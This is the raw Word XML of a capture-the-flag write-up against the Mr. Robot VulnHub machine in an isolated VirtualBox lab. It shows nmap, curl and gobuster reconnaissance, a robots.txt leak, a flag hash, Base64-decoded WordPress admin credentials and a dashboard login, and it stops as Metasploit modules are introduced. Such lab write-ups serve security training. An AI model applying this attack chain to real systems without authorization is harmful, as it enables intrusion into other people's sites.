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C30A" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Critical WordPress Exploit Chain – Mr. Robot VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F1E3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Author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F46447C" w14:textId="09599906" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>Prakanth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BE4A7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Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303AEBEE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Vulnerable Machine:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve"> Mr. Robot (VulnHub)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F79CE3E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Target IP:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve"> 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA16FC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Attacker Machine:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve"> Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5580A20E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Attacker IP:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve"> 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D5CB20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Environment:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve"> Oracle VirtualBox (Host-Only Network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDE74E0" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="0A69B2DA">
          <v:rect id="_x0000_i1146" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57367E94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1. Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A2DF5C" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>The objective of this engagement was to simulate a real-world multi-stage web application attack against a vulnerable WordPress installation, ultimately achieving remote shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635FC654" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="13FF1AA8">
          <v:rect id="_x0000_i1147" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4872A8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2. Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326397AF" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve">Mr. Robot VM and Kali Linux were imported into </w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Oracle VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BEE9C5" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve">Both machines were configured to use </w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host-Only Networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041AF234" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>This ensured isolated communication between attacker and target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA5AE2" w14:textId="557B2015" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F8AADB4" wp14:editId="033F509D">
            <wp:extent cx="5731510" cy="3067685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12365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4676" name="Picture 1236524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471A" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="3CAE611E">
          <v:rect id="_x0000_i1148" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="666D705B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3. Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C50F1" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>A network scan was performed to identify active hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F39E70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5B6090DE" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>nmap -sn 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A27DA0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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBA28F5" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>Active hosts discovered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C223EE" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>192.168.56.101 – Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E954FF" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>192.168.56.103 – Mr. Robot VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426EBE49" w14:textId="78B681EF" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CA3A15E" wp14:editId="47963397">
            <wp:extent cx="5418290" cy="2133785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="247503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3207" name="Picture 2475032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D5E8" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="08D09DAF">
          <v:rect id="_x0000_i1149" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C8E18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4. Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D80AD05" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:lastRenderedPageBreak/>
        <w:t>The target host was scanned for open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7A5C68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4D37AF1D" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>nmap -p 80,443 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C45C140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880"/>
        <w:gridCol w:w="653"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C24EE" w:rsidRPr="003C24EE" w14:paraId="756C3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3ACA9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CD3A556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E7ABB31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State</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C24EE" w:rsidRPr="003C24EE" w14:paraId="5387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1F4D" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F0FBD71" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69E3642D" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C24EE" w:rsidRPr="003C24EE" w14:paraId="7870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9AE5" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BF73FF2" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="675D1163" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
            <w:r w:rsidRPr="003C24EE">
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D777523" w14:textId="3088A66E" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0565A381" wp14:editId="69E755CA">
            <wp:extent cx="5425910" cy="2712955"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="500162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2364" name="Picture 500162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9476" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="463DF7A0">
          <v:rect id="_x0000_i1150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD370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5. Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1625D2CE" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>Browsing the web service revealed a themed landing page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4414DD9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6F859889" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>curl http://192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73399FD3" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>The page displayed ASCII art and confirmed a WordPress backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B55CC3" w14:textId="4FD6A2F2" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7835ED56" wp14:editId="25D1F8B7">
            <wp:extent cx="5731510" cy="1653540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1631736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6421" name="Picture 1631736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91A" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="52517FAE">
          <v:rect id="_x0000_i1151" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7030D020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6. Directory Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD58FC" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>Gobuster was used to discover hidden files and directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B6AA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5678525A" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>gobuster dir -u http://192.168.56.103 -w /usr/share/wordlists/dirb/common.txt -x txt,php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FC28E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Key Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BAEAF5" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D49132" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>/license</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D2FCFC" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>/wp-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6185F55B" w14:textId="5B295C1D" w:rsidR="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:t>/key-1-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F47A79" w14:textId="14B405C4" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="594DDE95" wp14:editId="130E474C">
            <wp:extent cx="5731510" cy="3060065"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="194753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261" name="Picture 194753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96EC" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="1B9C05CA">
          <v:rect id="_x0000_i1152" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904C709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7. Sensitive Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37545BF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robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5804D1" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>Accessing robots.txt revealed sensitive paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD9EB7" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>User-agent: *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7EB5AF" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>fsocity.dic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CE74B" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>key-1-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00121798" w14:textId="3F00F1D3" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="224A0E69" wp14:editId="3A7C997A">
            <wp:extent cx="5731510" cy="2215515"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1076727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7908" name="Picture 10767279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D2B2" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="4B96C61D">
          <v:rect id="_x0000_i1153" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE2E48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Key 1 Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376541A5" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve">Visiting /key-1-of-3.txt revealed an </w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MD5 hash</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294186E" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>073403c8a58a1f80d943455fb30724b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467A045C" w14:textId="2120C057" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="007F7C7C" wp14:editId="22BDF43D">
            <wp:extent cx="4572396" cy="2842506"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2040949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9482" name="Picture 2040949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1370" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="723B150F">
          <v:rect id="_x0000_i1154" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E249D9B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8. Credential Discovery via License Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBF2F0E" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>Visiting /license displayed a Base64-encoded string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7D0D9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Encoded String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E59A8" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>ZWxsaW90OkVSMjgtMDY1Mg==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C423DA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Decoded Using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444DFCE" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>echo ZWxsaW90OkVSMjgtMDY1Mg== | base64 --decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614AA00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lastRenderedPageBreak/>
        <w:t>Credentials Obtained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E9FD3F" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve"> Elliot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A4FF0D" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C24EE">
        <w:t xml:space="preserve"> ER28-0652</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D97329" w14:textId="74749949" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2393C269" wp14:editId="5824B3B0">
            <wp:extent cx="5731510" cy="3073400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="153683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251" name="Picture 1536832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98C51" wp14:editId="612CB7CF">
            <wp:extent cx="3589331" cy="548688"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="144841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181" name="Picture 144841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B2C8" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="5FA3C813">
          <v:rect id="_x0000_i1155" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E4FAF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9. WordPress Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5893F325" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>The credentials were used to log in successfully at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3B4F9" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>http://192.168.56.103/wp-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A288D4" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>Access to the WordPress admin dashboard was obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3667F4B9" w14:textId="66499ECD" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="315E1982" wp14:editId="4DB948A5">
            <wp:extent cx="5731510" cy="3064510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1067014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14153" name="Picture 10670141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3087" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:pict w14:anchorId="293F62D6">
          <v:rect id="_x0000_i1156" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00668449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10. Exploitation Attempt with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EDA4CE" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:r w:rsidRPr="003C24EE">
        <w:t>Multiple Metasploit modules were tested, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D86D31" w14:textId="77777777" w:rsidR="003C24EE" w:rsidRPr="003C24EE" w:rsidRDefault="003C24EE" w:rsidP="003C24EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C24EE">
